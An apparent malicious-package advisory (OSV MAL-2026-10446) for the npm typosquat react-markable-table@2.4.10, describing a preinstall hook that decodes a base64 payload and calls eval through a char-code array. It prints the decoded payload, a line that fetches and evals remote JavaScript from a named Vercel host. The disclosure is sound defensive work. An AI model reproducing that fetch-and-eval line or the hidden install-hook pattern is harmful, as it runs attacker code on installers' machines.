react-markable-table @2.4.10
Vulnerability report · Last retrieved from osv.dev July 14, 2026 at 5:45 AM UTC
OSV ID
MAL-2026-10446
Ecosystem
npm
Summary
react-markable-table@2.4.10 is a typosquat of markdown-table (declared repo field wooorm/markdown-table ). package.json declares a preinstall hook that runs node index.d.js . That script base64-decodes an embedded payload which resolves to eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root2').then(r=>r.text())) , and invokes it via globalThis[tag](text) where tag is reconstructed from the char-code array [101,118,97,108] (spelling eval ). Installing the package causes arbitrary attacker-controlled JavaScript to be fetched from a non-publisher Vercel host and executed in-process on the installer's machine at npm install time.
Source: amazon-inspector (da0db97919f41757fe4bcdc456d52ec0ecfbb89741438e5805a7bf5188b022c5)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.